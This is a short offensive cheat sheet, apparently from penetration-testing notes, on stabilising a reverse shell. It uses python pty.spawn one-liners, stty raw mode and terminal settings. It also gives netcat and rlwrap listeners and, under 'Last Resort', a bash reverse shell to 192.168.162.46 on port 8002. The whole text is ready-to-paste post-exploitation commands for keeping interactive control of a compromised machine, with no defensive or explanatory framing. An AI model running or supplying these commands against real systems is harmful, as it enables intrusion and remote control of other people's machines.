which python python2 python3
python -c 'import pty;pty.spawn("/bin/sh")'
python3 -c 'import pty;pty.spawn("/bin/sh")'
<CTL-Z>
stty raw -echo; fg
<enter><enter>
bash
stty cols 120 rows 35
export TERM=xterm-256color 
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp 
alias ll='ls -lsaht --color=auto' 
alias lt='ls -lsahtr --color=auto' 
reset

Windows works best with rlwrap
rlwrap nc -nlvp 443

Last Resort
bash -c "bash -i >& /dev/tcp/192.168.162.46/8002 0>&1"
nc -nvlp 8002
